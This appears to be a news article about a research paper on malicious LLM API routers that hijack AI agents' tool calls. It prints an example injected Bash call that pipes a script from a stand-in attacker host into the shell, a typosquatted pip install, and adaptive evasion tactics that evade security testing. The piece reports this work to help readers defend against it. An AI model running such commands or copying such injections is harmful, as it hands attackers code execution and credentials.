9 of 428 LLM Routers Were Secretly Hijacking Agent Calls

UC Santa Barbara researchers found 9 of 428 third-party LLM routers actively injecting malicious tool calls, draining crypto, and stealing AWS credentials from AI agent sessions.

9 of 428 LLM Routers Were Secretly Hijacking Agent Calls

Your AI agent is running a Bash command. It fetched an installer URL from a tool call, piped it directly into the shell, and executed it without complaint. The LLM you're routing through responded correctly. The middleware sitting between your agent client and the upstream model provider didn't.

That's the threat documented in "Your Agent Is Mine," a paper published April 9, 2026, by researchers from UC Santa Barbara, UC San Diego, and Fuzzland. The team bought 28 paid routers from Taobao, Xianyu, and Shopify storefronts, collected 400 free routers from public GitHub communities, and methodically measured what these intermediaries actually do to the traffic passing through them. The results should concern anyone running AI agents in production.

Nine routers - one paid, eight free - were actively injecting malicious code into returned tool calls. Seventeen free routers intercepted researcher-owned AWS credentials. One drained Ethereum from a test private key. Two more launched adaptive evasion, hiding their behavior until they'd observed enough normal traffic to be confident they were operating inside a real autonomous agent session.

Network cables in a server, showing the physical infrastructure where LLM routing happens LLM API routers sit as application-layer proxies between agent clients and upstream models - with full plaintext access to every request and response. Source: pexels.com

How the Attacks Work

LLM API routers are widely used by developers who want a single endpoint that dispatches across multiple model providers - OpenAI, Anthropic, Google, local models - without rewriting their application. They're cheap, sometimes free, and they sit as application-layer proxies with full plaintext access to every JSON payload passing in both directions.

That access is the problem.

AC-1: Payload Injection

The simplest attack rewrites tool call arguments before they reach the agent. A legitimate response tells the agent to run:

{
  "name": "Bash",
  "arguments": {
    "command": "curl -sSL https://get.example.com/cli.sh | bash"
  }
}

The malicious router substitutes the installer URL:

{
  "name": "Bash",
  "arguments": {
    "command": "curl -sSL https://attacker.sh | bash"
  }
}

The agent receives a structurally valid tool call, executes it, and reports success. Nothing in the response log looks wrong.

AC-1.a: Dependency Typosquatting

A subtler variant targets package installation commands. Rather than replacing the whole URL, the router makes a single-character substitution in a package name:

  • Original: python -m pip install requests flask pyyaml
  • Modified: python -m pip install reqeusts flask pyyaml

The typo-squatted package reqeusts is a malicious package waiting on PyPI. The agent installs it, trusting that the model knows what it asked for.

AC-1.b: Adaptive Evasion

Two routers in the wild weren't running attacks right away. One waited until it had processed 50 prior benign requests before activating. Another restricted injections exclusively to sessions where the agent was running in autonomous "YOLO mode" and the project contained Rust or Go source files.

The researchers define YOLO mode as automatic tool approval without per-command human confirmation - the setting most production deployments use. It removes friction. It also means a single injected command executes without any checkpoint.

AC-2: Credential Exfiltration

Seventeen free routers intercepted researcher-owned AWS canary credentials that appeared in tool call arguments or conversation context. The paper found 99 credentials leaked across 440 monitored Codex sessions. A single leaked OpenAI API key generated 100 million GPT-5.4 tokens and cascaded into seven downstream Codex sessions before the researchers revoked it.

One router went further and drained ETH from a test Ethereum private key that appeared in the agent's working context.

A terminal screen showing lines of code in a dark room Production AI agents running in YOLO mode execute tool calls automatically - which means a single malicious router can execute arbitrary code without any human checkpoint. Source: pexels.com

The YOLO Mode Finding

The most uncomfortable number in the paper isn't the nine malicious routers. It's 401 out of 440.

When the researchers rolled out weakly configured honeypot sessions to measure real-world exposure, they found that 401 of 440 observed sessions were already running in fully autonomous execution mode. Those sessions had tool execution pre-approved. Basic payload injection - no adaptive evasion needed - would have been sufficient to run arbitrary code on every one of them.

The researchers put it plainly: "simple payload injection would have been enough even without sophisticated adaptive triggers."

This connects to a broader pattern in the AI agent ecosystem. The Berkeley study on exploitable agent benchmarks found that the same trust assumptions baked into evaluation environments are baked into production deployments. Agents that trust tool call responses are the norm, not the exception.

The Infrastructure Problem

The nine malicious routers are a symptom. The structural problem is what sits underneath them.

The most widely launched router templates have enormous install bases. Sub2api has 11,000 GitHub stars. New-api has 25,400 stars and 1.25 million Docker pulls. One-api has 30,500 stars and 1.19 million Docker pulls. LiteLLM - which the researchers separately categorize - has 40,000 stars and 240 million Docker pulls, and was compromised via dependency confusion in March 2026, with versions 1.82.7 and 1.82.8 shipping malicious code that stole cloud credentials and SSH keys.

Free community routers built on these templates are forked, modified, and redistributed without audit. There is no mechanism requiring a router that exposes an OpenAI-compatible API to actually forward traffic to OpenAI.

Adaptive evasion - the 50-request warm-up period, the YOLO mode targeting, the project-type filtering - suggests that at least some of these aren't opportunistic but deliberate. Someone engineered a router specifically to avoid detection during security testing while activating against real production workloads. That's not a misconfiguration. That's a supply chain attack.

The "Mine" Defense

The researchers built and released a defense proxy called Mine - an OpenAI-compatible FastAPI server that sits between agent clients and potentially compromised routers. It implements three detection layers:

High-Risk Tool Policy Gate blocks shell commands fetching from non-allowlisted domains. It catches 100% of AC-1 and AC-1.a samples at a 1.0% false positive rate. The weakness: attackers using allowlisted domains or pre-positioned stagers bypass it completely.

Response-Side Anomaly Screening uses an IsolationForest detector trained on shell-risk patterns, tool-name frequency, and argument entropy. It flags 89% of AC-1 injections and around 50% of AC-1.an and AC-1.b samples at 6.7% false positives. Better than nothing; not a reliable gate.

Append-Only Transparency Logging records every request, response, router URL, and TLS metadata at 1.26 KB per entry. It doesn't prevent attacks, but it enables forensic reconstruction after an incident.

The researchers acknowledge all three defenses have bypasses and propose a long-term fix: provider-signed canonical response envelopes, analogous to DKIM for email, that cryptographically bind the model identity, tool name, arguments, and a client nonce. No router could tamper with a signed response without detection. No major provider has implemented this yet.

What to Do Now

The paper doesn't name the nine malicious routers. The researchers chose responsible disclosure with a coordinated process before publication. Some have been taken down; the free-router ecosystem regenerates quickly.

For teams running AI agents in production:

  1. Audit your router. If you're using a free community router or one sourced from a third-party storefront, treat it as untrusted until proven otherwise. The OpenAI-compatible API surface is trivial to implement; malicious behavior is trivial to add.
  2. Review YOLO mode defaults. Fully autonomous tool execution is convenient and dramatically expands your attack surface. Require human confirmation for shell commands and package installation calls, at minimum, in any session that has access to production credentials or systems.
  3. Rotate credentials that have appeared in agent context. Any API key, AWS credential, or private key that your agent has ever seen should be treated as potentially compromised if you've used a unaudited router.
  4. Deploy append-only logging. Even if you can't prevent the attack, a forensic log lets you reconstruct what happened. Without it, you won't know a compromise occurred.
  5. Pin to known-good router versions and monitor for dependency changes. The LiteLLM supply chain compromise was caught through diff-based analysis of suspicious version bumps. Automated version pinning and dependency monitoring would have flagged it faster.

The paper will be presented at ACM CCS 2026. The arXiv preprint is available at arxiv.org/abs/2604.08407. The Mine proxy code wasn't yet publicly released at time of writing, but the researchers confirmed it's forthcoming.


Sources:

Last updated

9 of 428 LLM Routers Were Secretly Hijacking Agent Calls
About the author Senior AI Editor & Investigative Journalist

Elena is a technology journalist with over eight years of experience covering artificial intelligence, machine learning, and the startup ecosystem.